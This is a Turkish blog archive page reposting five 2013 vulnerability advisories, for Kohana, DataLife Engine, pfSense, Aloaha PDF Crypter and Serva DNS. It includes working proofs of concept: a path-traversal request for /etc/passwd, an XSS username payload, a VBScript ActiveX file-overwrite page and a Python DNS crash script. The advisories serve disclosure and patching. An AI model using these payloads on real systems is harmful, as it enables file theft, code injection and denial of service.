Archive for 29 Ocak 2013

Kohana Framework v2.3.3 Directory Traversal Vulnerability

Kohana Framework v2.3.3 Directory Traversal Açığına ilişkin açıklamalar şu şekilde;

Title:
======
Kohana Framework v2.3.3 - Directory Traversal Vulnerability


Date:
=====
2013-01-27


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=841


VL-ID:
=====
837


Common Vulnerability Scoring System:
====================================
7.1


Introduction:
=============
Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be 
swift, secure, and small. (copy from vendor website) This is an OOP framework that is extremely DRY. Everything is built 
using strict PHP 5 classes and objects. Many common components are included: translation tools, database access, code 
profiling, encryption, validation, and more.

Extending existing components and adding new libraries is very easy. Uses the BSD license, so you can use and modify it for 
commercial purposes. Benchmarking a framework is hard and rarely reflects the real world, but Kohana is very efficient and 
carefully optimized for real world usage. Very well commented code and a simple routing structure makes it easy to understand 
what is happening. Simple and effective tools help identify and solve performance issues quickly.

(Copy of the Vendor Homepage: http://kohanaframework.org/ )



Abstract:
=========
The Vulnerability Laboratory Research Team discovered a Directory Traversal web vulnerability in the Kohana v2.3.3 Content Management System.


Report-Timeline:
================
2013-01-27:	Public Disclosure


Status:
========
Published


Affected Products:
==================
Kohana
Product: Framework - Content Management System 2.3.3


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
A Directory Traversal web vulnerability is detected in the Kohana Content Management System web application.
The vulnerability allows remote attackers to request local directories and files of the web server application system.

The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` file in line 90 when processing to request 
the path dir via replace. The filter replaces `../` by null and it applies on file reading requests. 

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
->uri(array(
'action' => 'thumb',
'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)
));

Remote attackers can bypass the validation with the vulnerable replace function in the file browser to read local 
web server files via directory (path) traversal attack.

Exploitaton of the vulnerability requires no privileged application user account and no user interaction.
Successful exploitation of the vulnerability results in read of arbitrary system files to compromise web server.

Vulnerable Module(s):
				[+] Filebrowser

Vulnerable Function(s):
				[+] str_replace > dir

Vulnerable Parameter(s): 
				[+] ?path


Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction.
For demonstration or reproduce ...

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
->uri(array(
'action' => 'thumb',
'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)
));


Review: GET Request
GET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..
%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd 
HTTP/1.0
Host: media.[server].com
User-Agent: Kami VL


PoC: 
http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd 


Risk:
=====
The security risk of the directory traversal web vulnerability is estimated as high(+).
 


Credits:
========
Vulnerability Laboratory [Research Team]  - Karim B. (kami@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright � 2012 | Vulnerability Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com


DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability

DataLife Engine 9.7 (preview.php) PHP Code Injection Açığına ilişkin exploit ve açıklamalar aşağıdaki gibidir.

------------------------------------------------------------------
DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability
------------------------------------------------------------------

[-] Software Link:

http://dleviet.com/


[-] Affected Version:

9.7 only.


[-] Vulnerability Description:

The vulnerable code is located in the /engine/preview.php script:

246.	$c_list = implode (',', $_REQUEST['catlist']);
247.
248.	if( strpos( $tpl->copy_template, "[catlist=" ) !== false ) {
249.		$tpl->copy_template = preg_replace( "#\\[catlist=(.+?)\\](.*?)\\[/catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}')", $tpl->copy_template );
250.	}
251.		
252.	if( strpos( $tpl->copy_template, "[not-catlist=" ) !== false ) {
253.		$tpl->copy_template = preg_replace( "#\\[not-catlist=(.+?)\\](.*?)\\[/not-catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}', false)", $tpl->copy_template );
254.	}

User supplied input passed through the $_REQUEST['catlist'] parameter is not properly
sanitized before being used in a preg_replace() call with the e modifier at lines 249 and 253.
This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of
this vulnerability requires a template which contains a “catlist” (or a “not-catlist”) tag.


[-] Solution:

Apply the vendor patch: http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html


[-] Disclosure Timeline:

[16/01/2013] - Vendor notified
[19/01/2013] - Vendor patch released
[20/01/2013] - CVE number requested
[21/01/2013] - CVE number assigned
[28/01/2013] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1412 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-01

PFsense UTM Platform 2.0.1 XSS Vulnerability

PFsense UTM Platform 2.0.1 XSS Açığı bulunmuş olup açık bulucunun açığın kullanımı ve açıklamaları aşağıdaki gibidir.

┴┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┴
 │ Exploit Title: pfSense <= 2.0.1 XSS & CSRF during IPSec XAuth authentication
 │ Date: 04/01/2013
 │ Author: Dimitris Strevinas
 │ Vendor or Software Link: www.pfsense.org
 │ Version: <= 2.0.1
 │ Category: Semi-Persistent XSS & CSRF
 │ Google dork:
 │ Tested on: FreeBSD
┬┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┬
 
 
 pfSense UTM distribution description
┌────────────────────────────────────┘
 pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. 
 This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus. 
 [source: www.pfsense.org]
 The IPSec VPN functionality on pfSense is implemented using the Racoon vpn concentrator software.
 
 
 Vulnerability Summary
┌──────────────────────┘
 pfSense versions 2.0.1 and prior are vulnerable to semi-persistent XSS and CSRF attack vectors, exploited by sending Javascript/HTML code as a username during the XAuth user authentication phase. 
 XAUTH provides extended authentication for IPSec telecommuters by using authentication schemes such as RADIUS or internal user databases. [source: www.ciscopress.org]
 The vulnarability lies in diag_logs_ipsec.php which does not properly escape HTML characters in the Racoon log files.
 It is assumed that the attacker has successfully completed IPSEC Phase 1 and Phase 2 based on one of the following schemes:
	. Mutual RSA
	. Mutual PSK
	. Hybrid RSA
 It should also be noted that newer pfSense version use CSRF-magic on the majority of Web GUI forms, thus the CSRF exploitation likelihood is minimized at least in the standard installation.


 Exploit Path 
┌─────────────┘
 1) Perform the Phase 1 and Phase 2 using a VPN Client and known credentials/certificates
 2) During the XAuth provide a username like "><script>alert("XSS")</script> and a random password
 3) The reflection of the XSS/CSRF is in the logs under Status > System Logs > IPSec
 The XSS "time-to-live" depends on the Racoon logging verbosity, max number of log lines and vpn activity. Nevertheless, it can be resubmitted to be shown again on top.

 
 Solution
┌─────────┘
 Patch available by vendor, streamlined to 2.1
 URL: http://redmine.pfsense.org/projects/pfsense-tools/repository/revisions/0675bde3039a94ee2cadc360875095b797af018f


 Credits & Contact
┌──────────────────┘
 Dimitris Strevinas
 Obrela Security Industries
 CONTACT: www.obrela.com
 

Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite

Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite dos exploit

============================================================================================
TITLE:
============================================================================================
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
 
url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip
author: shinnai (http://shinnai.altervista.org)
============================================================================================
FILE INFO:
============================================================================================
File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
ACTIVEX INFO:
============================================================================================
ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class
Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
============================================================================================
BUG:
============================================================================================
This activex contains the "SaveToFile" which could be used to overwite arbitrary files on
pc users.
============================================================================================
PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================

Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability

Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability

#!/usr/bin/python
 
# Exploit Title: Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed QueryName causes the crash
# Howto:         -
 
import socket
 
target="192.168.0.1"
port=53
 
TransACTID="\x03\xc3"
Flags="\x01\x00"
QuestionRRC="\x00\x01"
AnswerRRC="\x00\x00"
AuthRRC="\x00\x00"
AddRRC="\x00\x00"
QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00" #vulnerable: first length-byte
QueryType="\x00\x01"
QueryClass="\x00\x01"
payload = TransACTID + Flags + QuestionRRC + AnswerRRC +  AuthRRC + AddRRC + QueryName + QueryType + QueryClass
 
print "[*] Connecting to Target " + target + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0) #udp
 
print "[*] Sending malformed request..."
 
s.sendto(payload,(target,port))
 
print "[!] Exploit has been sent!\n"
s.close()